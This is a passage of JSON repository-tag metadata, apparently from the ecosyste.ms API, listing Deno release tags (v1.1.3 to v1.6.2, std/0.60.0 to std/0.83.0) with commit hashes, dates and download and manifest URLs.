rl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ec